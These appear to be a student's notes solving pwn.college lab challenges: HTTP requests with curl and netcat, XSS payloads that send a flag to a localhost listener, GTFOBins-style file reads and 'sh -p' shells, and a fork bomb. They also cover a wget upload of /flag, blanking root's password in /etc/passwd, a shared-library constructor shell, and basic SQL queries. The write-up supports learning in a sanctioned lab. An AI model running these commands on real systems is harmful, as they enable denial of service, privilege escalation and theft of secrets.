PwnCollege - note basic

Posted on In Views: Disqus:

1. Fork Bomb

A classic bash fork bomb that recursively calls itself to exhaust system resources.

1
2
3
4
myfunc () {
  myfunc | myfunc
}
myfunc

2. Web Security

2.1 Basic Requests

Using netcat and curl to perform simple GET requests.

1
2
3
4
5
# Manual GET request via nc
printf "GET / HTTP/1.1\r\nHost: localhost\r\nConnection: close\r\n\r\n" | nc localhost 80

# Simple GET via curl
curl -X GET "http://localhost/"

2.2 Custom Headers

Setting the Host header for different tasks.

1
2
3
4
5
6
# Task: Host: root-me.org
curl -X GET http://localhost/task -H "Host: root-me.org"

# Task: Host: net-force.nl:80
curl -v -X GET http://localhost/gate -H "Host: net-force.nl:80"
printf "GET /gate HTTP/1.1\r\nHost: net-force.nl:80\r\nConnection: close\r\n\r\n" | nc localhost 80

2.3 URL Encoding & Query Parameters

Handling spaces and multiple parameters.

1
2
3
4
5
6
7
# URL Encoded Path: /progress%20request%20qualify
printf "%b" "GET /progress%20request%20qualify HTTP/1.1\r\nHost: challenge.localhost:80\r\nConnection: close\r\n\r\n" | nc localhost 80

# Query Strings
printf "%b" "GET /mission?hash=crwtzkzq HTTP/1.1\r\nHost: challenge.localhost:80\r\nConnection: close\r\n\r\n" | nc localhost 80
printf "%b" "GET /request?access=ejnskvxx&token=rmxwpdzo&signature=fhhmtasz HTTP/1.1\r\nHost: challenge.localhost:80\r\nConnection: close\r\n\r\n" | nc localhost 80
curl -X GET "http://localhost/hack?pass=fjawumxb&security_token=yaanpzkj&security=xufooqmp" -H "Host: challenge.localhost:80"

2.4 POST Requests

Submitting data via application/x-www-form-urlencoded.

1
2
3
4
5
6
7
8
# Manual POST via nc
printf "%b" "POST /complete HTTP/1.1\r\nHost: challenge.localhost:80\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 22\r\nConnection: close\r\n\r\nchallenge_key=ocgzmivl" | nc localhost 80

# POST via curl
curl -X POST "http://localhost/hack" -H "Host: challenge.localhost:80" -d "token=ieovmiim&authcode=dhcrcdvp&access=cbmupwsi"

# Complex POST via nc
printf "%b" "POST /verify HTTP/1.1\r\nHost: challenge.localhost:80\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 74\r\nConnection: close\r\n\r\nsecure_key=rxwoveec&security=yyiezfbi&pass=oufnsrdp&challenge_key=menvugmn" | nc localhost 80

2.5 Cookies & State Management

Managing session data.

1
2
3
4
5
# Save and send cookies with curl
curl -c cookies.txt -b cookies.txt -L http://localhost/

# Manual Cookie Header
printf "%b" "GET / HTTP/1.1\r\nHost: localhost\r\nCookie: cookie=6136b40d5c4af043f373b9f786ce3d30\r\nConnection: close\r\n\r\n" | nc localhost 80

2.6 Redirects

Following HTTP 302 redirects.

1
2
3
4
5
# Manual handling (checking Location header)
printf "%b" "GET / HTTP/1.1\r\nHost: challenge.localhost:80\r\nConnection: close\r\n\r\n" | nc localhost 80

# Automated redirect following
curl -L -X GET "http://localhost/" -H "Host: challenge.localhost:80"

2.7 Client-Side Redirection & XSS-style Exfiltration

1
2
3
4
5
6
7
8
// Simple JS redirect
echo '<script>window.location = "/check";</script>' > ~/public_html/solve.html

// Data Exfiltration via URL
echo '<script src="/submit"></script><script>window.location="http://localhost:1337/?stolen="+flag;</script>' > ~/public_html/solve.html

// Exfiltration using Fetch
echo '<script>fetch("/gateway").then(r=>r.text()).then(d=>window.location="http://localhost:1337/?stolen="+d);</script>' > ~/public_html/solve.html

3. Program Misuse (GTFOBins)

Techniques for reading restricted files (like /flag) via unexpected program behavior.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
# Compressed formats
gzip -c /flag | gzip -d
bzip2 -c /flag | bzip2 -d
zip -c /flag | zip -d
tar -cO /flag | tar -xO

# Archive tools
ar r pwned.a /flag && ar p pwned.a
echo /flag | cpio -o

# Shell/Execution wrappers
env /bin/sh -p
nice /bin/sh -p
timeout 0 /bin/sh -p
setarch $(arch) /bin/sh -p
socat - 'exec:/bin/sh -p,pty,ctty,raw,echo=0'

# Text processing / viewing
find /flag -exec cat {} \;
mawk '//' /flag
sed '' /flag
whiptail --textbox --scrolltext /flag 50 100
ed /flag # Use ',p' to print, 'q' to quit

# Language Interpreters
perl -ne print /flag
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
ruby -e 'puts File.read("/flag")'

# Miscellaneous
date -f /flag
dmesg -rF /flag
wc --files0-from /flag
gcc -x c -E /flag
as @/flag

# Network tools
nc -lp 1337 & wget --post-file=/flag http://127.0.0.1:1337/

3.1 Privilege Escalation Tricks

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# Changing permissions/ownership
chown $(id -un):$(id -gn) /flag
chmod 777 /flag

# Shadowing root password
cp /etc/passwd ./hack_passwd
sed -i 's/^root:x:/root::/' ./hack_passwd
mv ./hack_passwd /etc/passwd
su root

# Shared Library Injection
echo '#include <unistd.h>
void C_GetFunctionList() {}
void __attribute__((constructor)) init() {
    execl("/bin/sh", "sh", "-p", NULL);
}' | gcc -w -fPIC -shared -o lib.so -x c -
/challenge/ssh-keygen -D ./lib.so

4. SQL Injection Basics

4.1 Simple Selects

1
2
3
4
5
6
-- Select all logs
SELECT * FROM logs;

-- Filter by ID/Tag
SELECT * FROM entries WHERE flag_tag = 1337;
SELECT resource FROM flags WHERE flag_tag != 1;

4.2 Pattern Matching & String Manipulation

1
2
3
4
5
6
7
8
-- LIKE operator
SELECT detail FROM payloads WHERE flag_tag LIKE "yep";

-- Substring matching
SELECT detail FROM items WHERE substr(detail, 1, 3) = 'pwn';

-- Complex substring extraction (brute-forcing length)
SELECT substr(secret, 1, 5), substr(secret, 6, 5) FROM items;

4.3 Database Schema Exploration

1
2
3
4
5
-- List tables in SQLite
SELECT name FROM sqlite_master WHERE type='table';

-- Querying found tables
SELECT flag FROM UgRKNxaq;